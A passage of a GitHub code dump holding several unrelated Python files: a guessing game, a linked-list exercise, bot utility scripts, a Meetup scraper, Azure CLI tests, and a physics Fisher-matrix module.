\"\"\"Parse a requirement into a module and version parts.\"\"\"\n reqs = {}\n for req in requirements.splitlines():\n match = re.match('^([^>=<]+)([>=<]+)([^>=<]+)$', req)\n module = match.group(1)\n compare = match.group(2)\n version = LooseVersion(match.group(3))\n reqs[module] = {'compare': compare, 'version': version}\n return reqs","repo_name":"gersteinlab/BioCoder","sub_path":"evaluation/Fuzzer/test_functions/python_test_function_5/golden.py","file_name":"golden.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"5"} +{"seq_id":"2228806188","text":"\nclass Student:\n\n def __init__(self, name, rollno):\n self.name = name\n self.rollno = rollno\n self.lap = self.Laptop()\n\n def show(self):\n print(self.name, self.rollno)\n\n class Laptop:\n def __init__(self):\n self.brand = 'HP'\n self.cpu = 'i5'\n self.ram = \"8GB\"\n\n def show(self):\n print(self.brand, self.cpu, self.ram)\n\n\n\ns1 = Student('Navin', 2)\ns2 = Student('Jenny', 3)\n\nprint(s1.show())\nprint(s1.lap.brand)\nlap1 = Student.Laptop()\nprint(lap1.show())\n","repo_name":"cartosat/python_base","sub_path":"oops/inner_class.py","file_name":"inner_class.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"6781238256","text":"from art import logo\nimport random\n\nEASY_DIFFICULTY = 10\nHARD_DIFFICULTY = 5\n\n\ndef difficulty():\n if input(\"Choose a difficulty. Type 'easy' or 'hard': \") == \"easy\":\n return EASY_DIFFICULTY\n else:\n return HARD_DIFFICULTY\n\n\ndef check_answer(guess, the_number, lives):\n \"\"\"Checks answer agains guess. Returns the number of turns remaining\"\"\"\n if guess == the_number:\n print(f\"You got it! The answer was {the_number}.\")\n elif guess < the_number:\n print(\"Too low.\")\n return lives - 1\n elif guess > the_number:\n print(\"Too high.\")\n return lives - 1\n\n\ndef game():\n print(logo)\n print(\"Welcome to the Number Guessing Game!\")\n print(\"I'm thinking of a number between 1 and 100.\")\n the_number = random.randint(1, 100)\n print(f\"Pssst, the correct answer is {the_number}\")\n lives = difficulty()\n guess = 0\n\n while not guess == the_number:\n print(f\"You have {lives} attempts remaining to guess the number.\")\n guess = int(input(\"Make a guess: \"))\n lives = check_answer(guess, the_number, lives)\n if lives == 0:\n print(\"You've run out of guesses, you lose.\")\n return\n elif guess != the_number:\n print(\"Guess again\")\n\n\n\ngame()\n","repo_name":"powas/100DaysOfCodeTheCompletePythonProBootcamp","sub_path":"012/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40151955338","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/30 16:11\n# @Author : Michael Zhang\n# @Site : \n# @File : FindKthTotail.py\n# @Software: Sublime\n\n'''\nQ: 输入一个链表,输出该链表中倒数第K个结点\n\nA: 设置两个指针指向头结点,第一个指针,第一个指针向前走k-1步,走到第k个测点,此时第二个测点和第一个指针同时移动,\n当第一个指针到尾结点的时候,第二个指针指向倒数第K个结点,注意链表为空,k=0,k大于链表的长度的情况\n'''\nclass ListNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution:\n\tdef FindKthToTail(self, head, k):\n\t\tif head == None or k <= 0:\n\t\t\treturn None\n\t\tpAhead = head\n\t\tpBhead = None\n\n\t\tfor i in range(k-1):\n\t\t\tif pAhead.next != None:\n\t\t\t\tpAhead = pAhead.next\n\t\t\telse:\n\t\t\t\treturn None\n\t\tpBhead = head\n\n\t\twhile pAhead.next != None:\n\t\t\tpAhead = pAhead.next\n\t\t\tpBhead = pBhead.next\n\t\treturn pBhead\n\t\t","repo_name":"Michaelhuazhang/code_offer","sub_path":"findKtail.py","file_name":"findKtail.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73017310233","text":"def robin_queue(n, m, c):\n pizza = [(i + 1, int(c[i])) for i in range(m)]\n # 오븐에 들어간 피자\n pizza_oven = pizza[:n]\n # 남은 피자\n pizza_left = pizza[n:]\n\n while len(pizza_oven) != 1:\n num, cheese = pizza_oven.pop(0)\n cheese //= 2\n\n if cheese:\n pizza_oven.append((num, cheese))\n else:\n if pizza_left:\n pizza_oven.append(pizza_left.pop(0))\n \n\n return pizza_oven.pop()\n\n\n\n# 테스트 케이스 입력\ntry:\n test_case = int(input('테스트 케이스 입력 : '))\nexcept ValueError:\n print('ValueError : Wrong Number!!')\nif not(1 <= test_case <= 50):\n raise ValueError\n\n\nfor t in range(1, test_case + 1):\n n, m = map(int, input('화덕 크기 n 과 피자 개수 m 을 입력하시오 : ').split())\n c = list(map(int, input('피자에 뿌려진 치즈의 양을 입력하시오 : ').split()))\n \n pizza_num = robin_queue(n, m, c)\n\n print(f'#{t} {pizza_num[0]}')","repo_name":"hawk90/NDD_study","sub_path":"SW-Academy/luann9711/queue/queue_3.py","file_name":"queue_3.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14886345544","text":"import os\nimport sys\nimport logging\nimport file_utils\nimport utils\nimport static\nimport classes\nimport configparser\nimport traceback\nfrom enum import Enum\n\nimport wiki\nfrom classes import Action\n\n### Logging setup ###\nLOG_LEVEL = logging.DEBUG\nif not os.path.exists(static.LOG_FOLDER_NAME):\n\tos.makedirs(static.LOG_FOLDER_NAME)\nLOG_FILENAME = static.LOG_FOLDER_NAME + \"/\" + \"bot.log\"\nLOG_FILE_BACKUPCOUNT = 5\nLOG_FILE_MAXSIZE = 1024 * 256 * 64\n\nclass ContextFilter(logging.Filter):\n\tdef filter(self, record):\n\t\trecord.gameid = static.logGameId\n\t\treturn True\n\nlog = logging.getLogger(\"bot\")\nlog.setLevel(LOG_LEVEL)\nlog_formatter = logging.Formatter('%(asctime)s - %(levelname)s:%(gameid)s %(message)s')\nlog_stdHandler = logging.StreamHandler()\nlog_stdHandler.setFormatter(log_formatter)\nlog.addHandler(log_stdHandler)\nlog.addFilter(ContextFilter())\nif LOG_FILENAME is not None:\n\tlog_fileHandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=LOG_FILE_MAXSIZE, backupCount=LOG_FILE_BACKUPCOUNT)\n\tlog_fileHandler.setFormatter(log_formatter)\n\tlog.addHandler(log_fileHandler)\n\n\ndef addWinnerFieldToGames():\n\tfolder = static.SAVE_FOLDER_NAME\n\tfor fileName in os.listdir(folder):\n\t\tif not os.path.isfile(os.path.join(folder, fileName)):\n\t\t\tcontinue\n\t\tgame = file_utils.loadGameObject(fileName)\n\t\tgame.status.winner = None\n\t\tfor status in game.previousStatus:\n\t\t\tstatus.winner = None\n\t\t\tfile_utils.saveGameObject(game)\n\n\ndef archiveOutstandingFinishedGames():\n\tfolder = static.SAVE_FOLDER_NAME\n\tfor fileName in os.listdir(folder):\n\t\tif not os.path.isfile(os.path.join(folder, fileName)):\n\t\t\tcontinue\n\t\tgame = file_utils.loadGameObject(fileName)\n\t\tif game.status.quarterType == classes.QuarterType.END:\n\t\t\tfile_utils.archiveGameFile(game.thread)\n\n\ndef replaceEnums(d):\n\tnewd = {}\n\tfor k, v in d.items():\n\t\tif isinstance(k, Enum):\n\t\t\tk = k.name\n\t\tif isinstance(v, dict):\n\t\t\tnewd[k] = replaceEnums(v)\n\t\telif isinstance(v, Enum):\n\t\t\tnewd[k] = v.name\n\t\telse:\n\t\t\tnewd[k] = v\n\treturn newd\n\n\ndef testPlaysTimes():\n\twiki.loadPlays()\n\tlog.info(f\"Loaded plays: {len(wiki.plays)}\")\n\tlog.info(str(replaceEnums(wiki.plays)))\n\twiki.loadTimes()\n\tlog.info(f\"Loaded times: {len(wiki.times)}\")\n\tlog.info(str(replaceEnums(wiki.times)))\n\n\ndef pastebinPlaylist(game_id, config_section):\n\tgame = file_utils.loadGameObject(game_id)\n\tplayBldr = []\n\tfor play in game.status.plays:\n\t\tplayBldr.append(str(play))\n\tplayString = '\\n'.join(playBldr)\n\tgistId = utils.paste(\n\t\t\"Thread summary\",\n\t\t''.join(playString),\n\t\tconfig_section['gist_username'],\n\t\tconfig_section['gist_token']\n\t)\n\tlog.info(static.GIST_BASE_URL + config_section['gist_username'] + \"/\" + gistId)\n\n\ndef archiveEndedGames():\n\tfor gameFile in os.listdir(static.SAVE_FOLDER_NAME):\n\t\ttry:\n\t\t\tgame = file_utils.loadGameObject(gameFile)\n\t\t\tif game.status.waitingAction == Action.END:\n\t\t\t\tfile_utils.archiveGameFile(gameFile)\n\t\texcept Exception as err:\n\t\t\tlog.warning(\"Can't archive game: {}\".format(gameFile))\n\t\t\tlog.warning(traceback.format_exc())\n\n\ndef loadPrintStrings():\n\twiki.loadStrings()\n\tfor key in wiki.strings:\n\t\tlog.info(key)\n\t\tfor item in wiki.strings[key]:\n\t\t\tlog.info(f\" {item}\")\n\n\nif len(sys.argv) < 2:\n\tprint(\"No arguments\")\n\tsys.exit(0)\n\nconfig = configparser.ConfigParser()\nif 'APPDATA' in os.environ: # Windows\n\tos_config_path = os.environ['APPDATA']\nelif 'XDG_CONFIG_HOME' in os.environ: # Modern Linux\n\tos_config_path = os.environ['XDG_CONFIG_HOME']\nelif 'HOME' in os.environ: # Legacy Linux\n\tos_config_path = os.path.join(os.environ['HOME'], '.config')\nelse:\n\tlog.error(\"Couldn't find config\")\n\tsys.exit()\nos_config_path = os.path.join(os_config_path, 'praw.ini')\nconfig.read(os_config_path)\n\nfunctionName = sys.argv[1]\nif functionName == \"testPlaysTimes\":\n\ttestPlaysTimes()\nelif functionName == \"pastebinPlaylist\":\n\tpastebinPlaylist(\"test\", config['Watchful1BotTest'])\nelif functionName == \"archiveEndedGames\":\n\tarchiveEndedGames()\nelif functionName == \"testStrings\":\n\tloadPrintStrings()\n","repo_name":"Watchful1/CFBRef","sub_path":"src/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"40001428315","text":"#!/usr/bin/env python\n\nimport sys\nsys.path.append('./venv/Lib/site-packages')\n\n#mapping imports\nimport folium\nfrom folium.plugins import MarkerCluster\n\n#source code is public but the database password must be kept secret sorry.\nsys.path.append('../../databaseSecret')\nfrom database import config\n\n#reading from mysql server thats hosted on the dal servers\nimport mysql.connector\nconnection = mysql.connector.connect(**config)\n\ncursor = connection.cursor()\nquery = (\"SELECT * FROM VetMSingleTable\")\ncursor.execute(query)\nresult = cursor.fetchall()\nfor row in result:\n print(row)\n\n#connection = pyodbc.connect('Driver={};'\n\ncoords_ns = [45.24664938443739, -63.24613206184815]\nmap = folium.Map(location=coords_ns, zoom_start=8)\n\nlatitude = 45.24\nlongitude = -63.246\n\ntuple = (latitude, longitude)\ntuple2 = (45.30, -63.25)\n\npoints = [tuple, tuple2]\n\nfolium.PolyLine(points).add_to(map)\n\n\n\nmap.save('ns_map.html')\n\n\n","repo_name":"nathanbowley98/VeteransMemorialHospital","sub_path":"mapping/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27768820008","text":"import driver as driver\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pandas as pd\n\nimport time\n\nPATH= \"C:\\Program Files (x86)\\chromedriver.exe\"\ndriver = webdriver.Chrome(PATH)\n\ndriver.get(\"https://www.meetup.com/de-DE/\") #Site to scrape\n\n# search = driver.find_element_by_xpath(\"\")\narr= []\ntry:\n search = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"navbar_search_input_id\"))\n )\n\n search.send_keys(\"Medizin\") #Thema hier ersetzen\n search.send_keys(Keys.RETURN)\n\n ortSuch = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"(//a[@class='dropdown-toggle'])[2]\"))\n )\n\n ortSuch.send_keys(Keys.RETURN)\n\n locationFind = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"locationSearch\"))\n )\n\n locationFind.send_keys(\"B\")\n time.sleep(2)\n locationFind.send_keys(\"e\")\n time.sleep(2)\n locationFind.send_keys(\"r\")\n # locationFind.send_keys(Keys.RETURN)\n\n time.sleep(4)\n\n location = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.LINK_TEXT, \"Berlin, Deutschland\"))\n )\n\n location.click()\n\n time.sleep(4)\n\n art = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'groupCard--gradient'))\n )\n\n elements = driver.find_elements_by_xpath(\"//h3[contains(@class,'padding-none inline-block')]\")\n\n time.sleep(3)\n cityArray = []\n name = []\n\n for element in elements:\n print(element.text)\n name.append(element.text)\n\n mitgliedern = driver.find_elements_by_xpath(\"//p[@class='small ellipsize']\")\n\n anzahlMitglieder = []\n for mitglieder in mitgliedern:\n print(mitglieder.text)\n anzahlMitglieder.append(mitglieder.text)\n\n urls = []\n i=0\n # for i in range(len(elements)):\n for i in range(len(elements)):\n try:\n p = driver.find_element_by_xpath('//*[@id=\"simple-view\"]/div[1]/ul/li[{}]/div/a[2]'.format(i + 1))\n url = p.get_attribute('href')\n urls.append(url)\n except Exception as s:\n print(s)\n pass\n\n infosArray = []\n beschreibubg =\"NONE\"\n for e in urls:\n gruppeMitgliederInfos = []\n scrollMitglieder = True;\n mehrBool = True;\n j = 0\n b = True\n t= True\n pp = 1\n driver.get(e)\n time.sleep(3)\n mehrLesen = driver.find_element_by_xpath('//*[@id=\"overview\"]/div/div/button')\n time.sleep(5)\n actions = ActionChains(driver)\n actions.move_to_element(mehrLesen).perform()\n mehrLesen.click()\n time.sleep(3)\n beschreibung = driver.find_element_by_xpath(\"(//p[@class='group-description margin--bottom'])[2]\")\n beschreibugText = beschreibung.text\n print(beschreibung.text)\n time.sleep(3)\n try:\n alleMitgliederButton = driver.find_element_by_xpath('//*[@id=\"members\"]/div[1]/div[2]/a')\n time.sleep(5)\n actions = ActionChains(driver)\n actions.move_to_element(alleMitgliederButton).perform()\n alleMitgliederButton.click()\n time.sleep(3)\n for h in range(4): #Wir machen die 4 mögliche Scroll down, um die Button 'Mehr Anzeigen' zu sehen\n inDerNaehe = driver.find_element_by_xpath('//*[@id=\"mupMain\"]/div[5]/div/section/div[1]/div/div[1]/h4')\n actions = ActionChains(driver)\n actions.move_to_element(inDerNaehe).perform()\n time.sleep(3)\n while(mehrBool==True):#Wird immer nach 'Mehr Anzeigen' gesucht, bis es keine Mehr gibt\n try:\n mehrMit = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[2]/button')\n mehrMit.click()\n actions = ActionChains(driver)\n actions.move_to_element(inDerNaehe).perform()\n time.sleep(3)\n except:\n pass\n mehrBool = False;\n mitgliederLocalise = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"member-list-card-id\"]/div[3]/div[1]'))\n )\n while (t == True): #Wenn wir am Ende der Liste sind, nehmen wir die Daten der Mitglieder der Gruppe\n try:\n mitgName = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[1]/ul/li[{}]/div/div[2]/div[1]/div/a/h4'.format(pp + 1))\n mitgEintritt = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[3]/div[1]/ul/li[{}]/div/div[2]/div[2]'.format(pp+1))\n pp = pp + 1\n gruppeMitgliederInfos.append((mitgName.text,mitgEintritt.text))\n except:\n t = False\n pass\n print(pp) #Um sicher zu sein dass alle Mitgliedern ausgegeben wurden\n print(len(gruppeMitgliederInfos))\n except:\n pass\n cityName = driver.find_element_by_class_name(\"groupHomeHeaderInfo-cityLink\").text\n grName = driver.find_element_by_class_name(\"groupHomeHeader-groupNameLink\").text\n anzahlMit = driver.find_element_by_class_name(\"groupHomeHeaderInfo-memberLink\").text\n organisator = driver.find_element_by_xpath('//*[@id=\"mupMain\"]/div[1]/div/section/div/div[2]/div/div[2]/div/div/div[3]/div/div/div/div[2]/a')\n findOrga = organisator.get_attribute('href')\n driver.get(findOrga)\n time.sleep(3)\n fuehrgunsTeamElements = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"member-list-card-id\"]/div[2]/div/ul'))\n )\n print(\"ddd\")\n\n orgArray = []\n stelleArray=[]\n while (b==True):\n try:\n fuehrgunsTeam = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[1]/div/a/h4'.format(j + 1))\n stelle = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[2]/div/span'.format(j+1))\n beigetretenAm = driver.find_element_by_xpath('//*[@id=\"member-list-card-id\"]/div[2]/div/ul/li[{}]/div/div[2]/div[2]/span'.format(j+1))\n j =j+1\n orgArray.append((fuehrgunsTeam.text, stelle.text,beigetretenAm.text))\n print(fuehrgunsTeam.text)\n print(stelle.text)\n print(beigetretenAm.text)\n except:\n b = False\n pass\n infosArray.append((grName, cityName, anzahlMit, e, orgArray, beschreibugText, gruppeMitgliederInfos))\n time.sleep(3)\n\n\nexcept Exception as s:\n print(s)\n\n\n\n\ndata_df = pd.DataFrame(data=infosArray,columns=['GruppenName','Location','Anzahl Mitglieder','Link','Organisatoren','Beschreibung','MitgliderInfos'])\n\ndata_df.to_json('e.json', orient='index', default_handler=str)\n\n# data_df = pd.read_json('a.json', orient='index')\n\n","repo_name":"ramirouatbi/Python-Meetup-Scraper","sub_path":"GetLink.py","file_name":"GetLink.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40115511218","text":"import os\nimport unittest\n\nfrom azure.cli.testsdk.scenario_tests import AllowLargeResponse\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\nfrom azure.cli.core.azclierror import ArgumentUsageError, InvalidArgumentValueError\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass OperationsScenarioTest(ScenarioTest):\n\n @ResourceGroupPreparer(parameter_name='resource_group_1')\n @ResourceGroupPreparer(parameter_name='resource_group_2')\n @ResourceGroupPreparer(parameter_name_for_location='location')\n def test_log_analytics_solution(self, resource_group_1, resource_group_2, location):\n\n self.kwargs.update({\n 'loc': location,\n 'workspace_name': self.create_random_name('workspace', 20),\n 'rg': resource_group_1,\n 'rg2': resource_group_2,\n 'sub': self.get_subscription_id(),\n 'la_prop_path': os.path.join(TEST_DIR, 'log_analytics.json')\n })\n self.kwargs['solution_type'] = 'Containers'\n self.kwargs['solution_name'] = self.kwargs['solution_type'] + '(' + self.kwargs['workspace_name'] + ')'\n\n workspace = self.cmd('resource create -g {rg} -n {workspace_name} -l {loc} --resource-type '\n 'Microsoft.OperationalInsights/workspaces -p @\"{la_prop_path}\"').get_output_in_json()\n self.kwargs.update({\n 'workspace_resource_id': workspace['id'],\n 'wrong_workspace_resource_id': workspace['id'][1:]\n })\n\n with self.assertRaises(InvalidArgumentValueError) as err:\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg} '\n '--solution-type {solution_type} '\n '--workspace \"{wrong_workspace_resource_id}\" ')\n self.assertTrue(\"InvalidArgumentValue: --workspace: Invalid format: resource id should be in '/subscriptions/{subscription}/resourceGroups/{resource_group}/providers/Microsoft.OperationalInsights/workspaces/{}' format.\" == err.exception)\n\n with self.assertRaises(ArgumentUsageError) as err:\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg2} '\n '--solution-type {solution_type} '\n '--workspace \"{workspace_resource_id}\" ')\n self.assertTrue(\"usage error: workspace and solution must be under the same resource group\" == err.exception)\n\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg} '\n '--solution-type {solution_type} '\n '--workspace \"{workspace_resource_id}\" '\n '--tags key1=value1',\n checks=[self.check('name', '{solution_name}')])\n\n self.cmd('az monitor log-analytics solution show --resource-group {rg} --name {solution_name}',\n checks=[self.check('name', '{solution_name}'),\n self.check('plan.publisher', 'Microsoft'),\n self.check('plan.product', 'OMSGallery/Containers'),\n self.check('tags', {'key1': 'value1'})])\n\n self.cmd('az monitor log-analytics solution update --resource-group {rg} --name {solution_name} '\n '--tags key2=value2',\n checks=[self.check('name', '{solution_name}'),\n self.check('tags', {'key2': 'value2'})])\n\n self.cmd('az monitor log-analytics solution show --resource-group {rg} --name {solution_name}',\n checks=[self.check('name', '{solution_name}'),\n self.check('plan.publisher', 'Microsoft'),\n self.check('plan.product', 'OMSGallery/Containers'),\n self.check('tags', {'key2': 'value2'})])\n\n self.kwargs['workspace_name2'] = self.create_random_name('workspace', 20)\n self.cmd('resource create -g {rg2} -n {workspace_name2} -l {loc} --resource-type '\n 'Microsoft.OperationalInsights/workspaces -p @\"{la_prop_path}\"').get_output_in_json()\n self.kwargs['solution_name2'] = 'Containers(' + self.kwargs['workspace_name2'] + ')'\n\n self.cmd('az monitor log-analytics solution create '\n '--resource-group {rg2} '\n '-t {solution_type} '\n '--workspace \"{workspace_name2}\" '\n '--tags key3=value3',\n checks=[self.check('name', '{solution_name2}')])\n\n self.cmd('az monitor log-analytics solution list --query \"value[?name==\\'{solution_name}\\']\"',\n checks=[self.check('length([])', 1)])\n\n self.cmd('az monitor log-analytics solution list --resource-group {rg2} '\n '--query \"value[?name==\\'{solution_name2}\\']\" ',\n checks=[self.check('length([])', 1)])\n\n self.cmd('az monitor log-analytics solution delete --resource-group {rg} --name {solution_name} -y',\n checks=[])\n\n self.cmd('az monitor log-analytics solution delete --resource-group {rg2} --name {solution_name2} -y',\n checks=[])\n\n self.cmd('az resource delete -g {rg} -n {workspace_name} --resource-type '\n 'Microsoft.OperationalInsights/workspaces', checks=[])\n\n self.cmd('az resource delete -g {rg2} -n {workspace_name2} --resource-type '\n 'Microsoft.OperationalInsights/workspaces', checks=[])\n\n self.cmd('az monitor log-analytics solution list --query \"value[?name==\\'{solution_name}\\']\"',\n checks=[self.check('length([])', 0)])\n\n self.cmd('az monitor log-analytics solution list --resource-group {rg2} '\n '--query \"value[?name==\\'{solution_name2}\\']\" ',\n checks=[self.check('length([])', 0)])\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/log-analytics-solution/azext_log_analytics_solution/tests/latest/test_log_analytics_solution_scenario.py","file_name":"test_log_analytics_solution_scenario.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"3474254567","text":"\"\"\"\nCreated on Sat Nov 13 12:50 2021\n\n@author: Andrea Antonelli.\n\nFunctions to calculate the population Fisher matrix for a 1-D power-law population model.\n\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport matplotlib as mpl\nimport seaborn as sns\nimport time\nimport pickle\n\n\nfrom scipy.special import erfc\nfrom sympy.parsing import mathematica as M\n\n\n# Load Mathematica expressions calculated offline. See notes on how to calculate Fisher matrix.\nwith open('Fisher_expressions.pickle', 'rb') as handle:\n Fisher_expressions = pickle.load(handle)\n\n\ndef Dalpha(Nobs,alpha,Mmin,Mmax):\n \n \"\"\"\n Estimates without selection effects.\n This expression is only valid for 1D fitting, and crucially it only accounts for the first term in the FM. \n More accurate estimates can be obtained with the Fisher matrix expression below.\n It is however a useful function to have for its compactness.\n \"\"\"\n\n with open('Fisher_expressions.pickle', 'rb') as handle:\n b = pickle.load(handle)\n\n Dalpha_simpified = M.mathematica(Fisher_expressions['Da_no_sel_firstterm']) # from Mathematica notebook.\n out = Dalpha_simpified.subs([('Nobs',Nobs),('alpha',alpha),('Mmax',Mmax),('Mmin',Mmin)]).evalf()\n \n return float(out)\n\ndef gaussian(d,mu,Sigma_sq): \n \n # My redefinition of gaussian to take the sigma^2 as input.\n \n num = np.exp(-0.5*(d-mu)**2/Sigma_sq)\n den = np.sqrt(2*np.pi*Sigma_sq)\n \n return num/den\n\n\n# Selection functions and derivatives.\n\ndef pdet_lambda(theta_samples,N_samps_selfunction,sigma,dth): \n \n \"\"\"\n \n Function for the selection function of the hyperparameters.\n \n Inputs:\n \n - theta_samples: an array of sampled data.\n - N_samps_selfunction: number of samples for the Monte Carlo integration.\n - sigma: noise variance.\n - dth: threshold in the presence of selection effects.\n \n \"\"\"\n return 0.5*N_samps_selfunction**-1*np.sum(erfc((dth-theta_samples)/np.sqrt(2)/sigma))\n\n\ndef pdet_theta(theta_samples,sigma,dth): \n \n \"\"\"\n \n Function for the selection function of the source parameters.\n Given the assumption of a gaussian noise model, we can analytically write down \n the function without resorting to Monte Carlo integration.\n \n Inputs:\n \n - theta_samples: an array of sampled data.\n - sigma: noise variance.\n - dth: threshold in the presence of selection effects.\n \n \"\"\"\n \n return 0.5* erfc((dth-theta_samples)/np.sqrt(2)/sigma)\n\n\n\n\ndef dpdet_dlambda(theta_samples, Lambda,lowerlimit,upperlimit,NsampsSelFct,var,threshold): \n \n \"\"\"\n Function for the first derivative of the selection function. Returns a number.\n \"\"\"\n \n arg_der_plambda = M.mathematica(Fisher_expressions['arg_der_plambda'])\n arg_list=[]\n \n for lnM in theta_samples:\n \n out = arg_der_plambda.subs([('alpha',Lambda),('Mmax',upperlimit),('Mmin',lowerlimit),('lnM',lnM)]).evalf()\n arg_list.append(float(out))\n \n arg = pdet_theta(theta_samples,var,threshold) * arg_list #set up argument of integral.\n \n return NsampsSelFct**-1*np.sum(arg) \n\n\n\ndef ddpdet_ddlambda(theta_samples, Lambda,lowerlimit,upperlimit,NsampsSelFct,var,threshold): \n \n \"\"\"\n Function for the second derivative of the selection function. Returns a number.\n \"\"\"\n \n arg_doubleder_plambda = M.mathematica(Fisher_expressions['arg_doubleder_plambda'])\n\n\n arg_list=[]\n \n for lnM in theta_samples:\n \n out = arg_doubleder_plambda.subs([('alpha',Lambda),('Mmax',upperlimit),('Mmin',lowerlimit),('lnM',lnM)]).evalf()\n arg_list.append(float(out))\n \n arg = pdet_theta(theta_samples,var,threshold) * arg_list\n \n return NsampsSelFct**-1*np.sum(arg) \n\n\n\n\ndef FM_1D_powerlaw(theta_samples,Lambda,upperlimit,lowerlimit,var,threshold,NsampsSelFct,Ndetections):\n \n t0 = time.time()\n \n # Load analytical expressions for the arguments of the integrals to solve here. See notes for more details.\n \n GammaI_arg = M.mathematica(Fisher_expressions['A_theta'])\n GammaII_arg = M.mathematica(Fisher_expressions['B_theta'])\n GammaIII_arg = M.mathematica(Fisher_expressions['C_theta'])\n GammaIV_arg = M.mathematica(Fisher_expressions['D_theta'])\n GammaV_arg = M.mathematica(Fisher_expressions['E_theta'])\n\n substitutions = [('selfct',pdet_lambda(theta_samples,NsampsSelFct,var,threshold)),\n ('derselfct',dpdet_dlambda(theta_samples,Lambda,lowerlimit,upperlimit, \n NsampsSelFct, var, threshold)),\n ('dderselfct',ddpdet_ddlambda(theta_samples,Lambda,lowerlimit,upperlimit, \n NsampsSelFct, var, threshold)),\n ('alpha',Lambda),\n ('Mmax',upperlimit),\n ('Mmin',lowerlimit),\n ('sigma',var),\n ('dth',threshold)\n ]\n \n \n ###################################\n # MC integration of the first term.\n ###################################\n \n \n GammaI_out = GammaI_arg.subs(substitutions).evalf() \n GammaI_out = GammaI_out * pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) # set up argument of integral.\n GammaI_int = float(NsampsSelFct**-1*np.sum(GammaI_out)) # perform the MC integration here.\n \n tI = time.time()\n print('------------------------------------------------')\n print('The first term in the FM takes', int(tI-t0), 's to evaluate')\n print('First integral:', Ndetections *GammaI_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the second term.\n ###################################\n \n \n GammaII_list=[]\n GammaII_arg_temp = GammaII_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaII_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaII_list.append(float(out))\n \n GammaII_arg = GammaII_list*pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaII_int = NsampsSelFct**-1*np.sum(GammaII_arg)# perform the MC integration here.\n \n tII = time.time()\n print('The second term in the FM takes', int(tII-tI), 's to evaluate')\n print('Second integral:', Ndetections *GammaII_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the third term.\n ###################################\n \n \n GammaIII_list=[]\n GammaIII_arg_temp = GammaIII_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaIII_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaIII_list.append(float(out))\n \n GammaIII_arg = GammaIII_list/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaIII_int = NsampsSelFct**-1*np.sum(GammaIII_arg)# perform the MC integration here.\n \n tIII = time.time()\n print('The third term in the FM takes', int(tIII-tII), 's to evaluate')\n print('Third integral:', Ndetections *GammaIII_int)\n print('------------------------------------------------')\n \n \n ###################################\n # MC integration of the fourth term.\n ###################################\n \n \n GammaIV_list=[]\n GammaIV_arg_temp = 